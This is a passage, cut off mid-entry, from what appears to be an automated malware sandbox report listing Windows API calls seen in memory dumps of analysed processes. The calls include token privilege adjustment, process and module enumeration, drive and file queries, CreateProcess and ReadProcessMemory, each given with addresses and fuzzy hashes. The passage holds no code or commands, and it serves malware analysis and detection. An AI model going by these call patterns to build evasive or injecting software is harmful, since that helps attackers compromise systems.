                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CFA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%


                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0049AD37
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0049AD37
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0049B329
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0049B329
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 020301D0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0203072D
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02030DD6
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0203109E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 02030819
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02030502
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0203072D
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 020308E5
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 0049A94A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02030DD6
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02030FB0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0049AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02031148
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0049A23E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0049BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 020308E5
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0203132F
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02030640
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0049AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0049AA71
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0203099C
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 02030819
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0049ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0049BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0049A23E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 020301D0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0203109E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0203132F
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 0049A94A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02030502
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02030FB0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02030640
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0049ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02031148
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0203099C
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0049AA71
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 7f346dee46ee6ad091f8b2162cc091b3c8eba8570e2953c425bc7463d4d5c8af
                                                        • Instruction ID: df818922a395e30eecc4527d307c4a860c242654c0afc044aac909f88f980b68
                                                        • Opcode Fuzzy Hash: 7f346dee46ee6ad091f8b2162cc091b3c8eba8570e2953c425bc7463d4d5c8af
                                                        • Instruction Fuzzy Hash: 47F0A935500B40CFEB20CF15D989762FFA0EB45721F18C0AADD094B352D278A914CAA7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0049A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: dd8b750576258477b6df103d72177390fcb15dbcafac549d854cbc2cb243d05b
                                                        • Instruction ID: 8322fbdd03702ebe8f981db0541f707beb1a62dd76f0f8adcc91ea496b6119a2
                                                        • Opcode Fuzzy Hash: dd8b750576258477b6df103d72177390fcb15dbcafac549d854cbc2cb243d05b
                                                        • Instruction Fuzzy Hash: D111A3755093809FDB11CF25DC85B93FFA4EF06220F0984EBED858F262D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0049A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8dc6017f31cb074f791c803ba9b10b4156b108dbd66a738f607aa5fe1a0f8d1d
                                                        • Instruction ID: 6bef438cef827c396e3a766a22ad3b3cfa761fa18caf08337165e282914b2ff4
                                                        • Opcode Fuzzy Hash: 8dc6017f31cb074f791c803ba9b10b4156b108dbd66a738f607aa5fe1a0f8d1d
                                                        • Instruction Fuzzy Hash: 9601DF75600640CFEB10DF15D8897A6FFA4EF05320F18C4BBDC098B342D279A814CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 005018A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 005018BA
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: 7b213770fedc1457c8141463648917ea8d463f700b5c364c13bfa5246b3c097a
                                                        • Instruction ID: 6768ae4208e382afe8011e61adcc4f61e8e183a0d0f061df2ed6b340f39dfb4d
                                                        • Opcode Fuzzy Hash: 7b213770fedc1457c8141463648917ea8d463f700b5c364c13bfa5246b3c097a
                                                        • Instruction Fuzzy Hash: 41E01A70E00208DFC754FFA8E88551A7BF8BB48300B1045A9C809D7384EB706A01CFB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00504D8E
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 98cac9d84fd64eed7341fc4180e61179a5d4ede651875b8bb98913ec1b1fa791
                                                        • Instruction ID: eab3dab2f13367fc04316790a0373422c6f43101ed3aeef7b2602d4557ada859
                                                        • Opcode Fuzzy Hash: 98cac9d84fd64eed7341fc4180e61179a5d4ede651875b8bb98913ec1b1fa791
                                                        • Instruction Fuzzy Hash: 0C9159B1D01619CFEB10CFA9C8417EEBBB6BF48314F148569D909A7280DB749D85CF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00504640
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
